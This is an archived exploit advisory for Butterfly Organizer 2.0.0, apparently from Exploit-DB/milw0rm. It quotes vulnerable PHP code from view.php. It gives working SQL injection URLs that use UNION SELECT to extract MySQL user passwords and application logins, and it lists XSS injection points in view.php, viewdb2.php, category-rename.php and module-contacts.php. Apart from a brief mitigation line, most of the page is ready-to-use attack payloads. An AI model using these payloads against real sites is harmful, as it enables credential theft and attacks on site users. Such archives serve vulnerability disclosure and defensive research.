Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

Butterfly Organizer

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: Butterfly Organizer

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:butterfly_media:butterfly_organizer:2.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities

A vulnerability exists in Butterfly Organizer 2.0.0 which allows an attacker to inject malicious SQL commands and execute them in the backend database. An attacker can also inject malicious JavaScript code into the application to perform XSS attacks. The vulnerable code is present in view.php, viewdb2.php, category-rename.php and module-contacts.php files.

Mitigation:

Input validation should be performed on all user-supplied data to prevent SQL injection and XSS attacks.

Source

Exploit-DB raw data:

======================================================================
 Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Butterfly Organizer
VERSION     : 2.0.0
DOWNLOAD    : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################

+++ Remote SQL Injection Exploit +++

----------------------------
 Vulnerable Code [view.php]
----------------------------
@Line

   26: $mytable = $_GET['mytable'];
   27: $id = $_GET['id'];
   28:
   29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
   30: $myrow = mysql_fetch_array($result);


----------
 Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category


-------------
 POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category



+++ Remote XSS Exploit +++


-----------
 Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-13]